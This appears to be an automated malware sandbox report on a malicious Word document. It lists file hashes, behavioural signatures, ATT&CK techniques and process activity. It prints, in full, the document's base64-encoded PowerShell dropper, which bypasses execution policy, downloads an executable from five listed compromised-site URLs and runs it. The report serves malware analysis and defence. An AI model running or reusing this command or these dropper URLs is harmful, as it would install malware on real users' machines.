Analysis

  • max time kernel
    126s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2023 15:29

General

  • Target

    Rech1075478616DEMai232019.doc

  • Size

    125KB

  • MD5

    659f175cbd422379fe3a6a63c5b1f640

  • SHA1

    61af3732c39c9ec9e6b0bd1234eba2ccfe8a42e6

  • SHA256

    5d7bd5ab1f0ef9fe49f97b49fc955f64a9878fc341650143d572b24126f1284b

  • SHA512

    bfe05e59cce39f8747a0ee1186a4a4f6d8834882972bf238f0dcd6743314871df4cb11e824e382ed95cb29808e7e0d75d6ab6d3aec69532d7865171a5e50aa87

  • SSDEEP

    3072:S77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q/tr0mXSSBgfy1:S77HUUUUUUUUUUUUUUUUUUUT52V8r0mj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://atlanticsg.com/wp-includes/fsfrz22_mkp29qlby-69478/

exe.dropper

http://eastpennlandscape.com/css/qhJUtdBFvM/

exe.dropper

http://mcs-interiors.co.uk/cgi-bin/MUbadZUIXD/

exe.dropper

http://laderajabugo.navicu.com/wp-admin/6ohv5j_6m40d-4652183/

exe.dropper

http://banphongresort.com/wp-includes/8hxbg02o_wkpvf-27459009/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Rech1075478616DEMai232019.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy bypass -noprofile -e JABRAG4AZgB6AGoASAB3AD0AJwBGAGkAcQBMAGwAdwAnADsAJABOAGwATQBJAGQAawAgAD0AIAAnADcAMAA2ACcAOwAkAHcAcwBOAGQAMAA1AD0AJwBYAGgAUgBpAGkATwBQAGwAJwA7ACQAdQBVAEkARQBPAGYAMgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAGwATQBJAGQAawArACcALgBlAHgAZQAnADsAJABaAEUAdwBCAFIAUwBPAD0AJwBuAEYAcAB6AGkAdwAnADsAJABUAHAAUwA0ADYAcwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBgAGUAdABgAC4AdwBFAGIAQwBgAGwASQBFAE4AdAA7ACQARAB3AGIAOQB6AHMAVwA9ACcAaAB0AHQAcABzADoALwAvAGEAdABsAGEAbgB0AGkAYwBzAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGYAcwBmAHIAegAyADIAXwBtAGsAcAAyADkAcQBsAGIAeQAtADYAOQA0ADcAOAAvAEAAaAB0AHQAcAA6AC8ALwBlAGEAcwB0AHAAZQBuAG4AbABhAG4AZABzAGMAYQBwAGUALgBjAG8AbQAvAGMAcwBzAC8AcQBoAEoAVQB0AGQAQgBGAHYATQAvAEAAaAB0AHQAcAA6AC8ALwBtAGMAcwAtAGkAbgB0AGUAcgBpAG8AcgBzAC4AYwBvAC4AdQBrAC8AYwBnAGkALQBiAGkAbgAvAE0AVQBiAGEAZABaAFUASQBYAEQALwBAAGgAdAB0AHAAOgAvAC8AbABhAGQAZQByAGEAagBhAGIAdQBnAG8ALgBuAGEAdgBpAGMAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgBvAGgAdgA1AGoAXwA2AG0ANAAwAGQALQA0ADYANQAyADEAOAAzAC8AQABoAHQAdABwADoALwAvAGIAYQBuAHAAaABvAG4AZwByAGUAcwBvAHIAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOABoAHgAYgBnADAAMgBvAF8AdwBrAHAAdgBmAC0AMgA3ADQANQA5ADAAMAA5AC8AJwAuAHMAUABsAEkAdAAoACcAQAAnACkAOwAkAEIAUwAyAHAAbQA1AHQAPQAnAGgAegBuAFUAYQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAbQA4AHoAXwBHAFIAIABpAG4AIAAkAEQAdwBiADkAegBzAFcAKQB7AHQAcgB5AHsAJABUAHAAUwA0ADYAcwAuAEQAbwBXAE4ATABPAEEAZABmAEkATABFACgAJABHAGkAbQA4AHoAXwBHAFIALAAgACQAdQBVAEkARQBPAGYAMgB6ACkAOwAkAEwAUQBYADYAYQA2AD0AJwBoAEoAcwB6AHMAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHUAVQBJAEUATwBmADIAegApAC4ATABFAE4ARwB0AEgAIAAtAGcAZQAgADMAMwA2ADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJAB1AFUASQBFAE8AZgAyAHoAKQA7ACQATABTAEkAMwA0AEsARgA9ACcAaABjAEgANwBWAGYAJwA7AGIAcgBlAGEAawA7ACQATwBoADUAdABtAFkAbQA9ACcAbgBBADQAaQAyAEcAYQB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAWQBVAEYAUwBqAD0AJwBvAEcAcwB3AE4AdQAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:624

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D7D1BD74.wmf
      Filesize

      444B

      MD5

      eb90590e76afc07bb16fb0c0d2d19575

      SHA1

      8b0d875cee73d6096885f007e20e5634b811dc43

      SHA256

      3757ecfd2881b2b62019ca4179e7b9d08be7fb636760d4f24a970c02ab39e17d

      SHA512

      761f6e9282ae775a7af1efacc1c1d8fa1be4e43415f3f016a89ed8815beea6dbcdc73562838d4a8d5dd671afac88794926f7c43b3dfe8798bd40a128001b2427

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0135rvm.bjq.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/624-178-0x000002B06FBA0000-0x000002B06FBB0000-memory.dmp
      Filesize

      64KB

    • memory/624-177-0x000002B06FBA0000-0x000002B06FBB0000-memory.dmp
      Filesize

      64KB

    • memory/624-163-0x000002B06FB70000-0x000002B06FB92000-memory.dmp
      Filesize

      136KB

    • memory/624-162-0x000002B06FBA0000-0x000002B06FBB0000-memory.dmp
      Filesize

      64KB

    • memory/2236-137-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-139-0x00007FFB38E50000-0x00007FFB38E60000-memory.dmp
      Filesize

      64KB

    • memory/2236-161-0x0000024D8D2F0000-0x0000024D8D4F0000-memory.dmp
      Filesize

      2.0MB

    • memory/2236-138-0x00007FFB38E50000-0x00007FFB38E60000-memory.dmp
      Filesize

      64KB

    • memory/2236-133-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-136-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-134-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-135-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-191-0x0000024D8D2F0000-0x0000024D8D4F0000-memory.dmp
      Filesize

      2.0MB

    • memory/2236-217-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-218-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-220-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB

    • memory/2236-219-0x00007FFB3AFB0000-0x00007FFB3AFC0000-memory.dmp
      Filesize

      64KB